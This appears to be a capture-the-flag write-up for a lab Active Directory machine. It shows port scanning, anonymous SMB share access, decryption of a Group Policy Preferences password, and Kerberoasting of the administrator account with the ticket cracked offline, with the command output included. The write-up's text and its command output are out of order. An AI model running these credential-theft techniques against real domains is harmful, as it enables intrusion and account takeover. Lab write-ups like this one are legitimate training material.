$ nmap -p- --min-rate 5000 10.129.192.152
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-05 02:08 EDT
Nmap scan report for 10.129.192.152
Host is up (0.014s latency).
Not shown: 60173 closed tcp ports (conn-refused), 5341 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49170/tcp open unknown
49172/tcp open unknown
Since this is an AD machine, we can start with basic enumeration of SMB shares, Kerberos and LDAP.
SMB Enum
Checking SMB shares via smbmap reveals there is one share available:
We can use smbclient to login and view the files:
We can download all the files present within the machine using these commands, and I saw an interesting file:
Within this file, we can find an encrypted pasword:
This was a GPO password, and it can be decrypted using gpp-decrypt since we have the key and the password.
Now, we have a password of a service account to use. With this, we can read the C:\Users directory and find the flag in the Desktop of SVC_TGS user.
Privilege Escalation
Kerberoasting
We have access to a service account here, and it is for the Ticket Granting Service. As such, we can attempt to do Kerberoasting.
So we can use this to harvest the TGS tickets for the administrator. Then, we can crack the hash (because user passwords are used to encrypt the tickets).
$ smbmap -H 10.129.192.152
[+] IP: 10.129.192.152:445 Name: 10.129.192.152
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
$ smbclient -U "" //10.129.192.152/Replication -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5186557 blocks available
mask ""
recurse ON
prompt OFF
mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (16.8 KiloBytes/sec) (average 23.8 KiloBytes/sec)
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2023-05-05 02:21) 0.2277g/s 2400Kp/s 2400Kc/s 2400KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
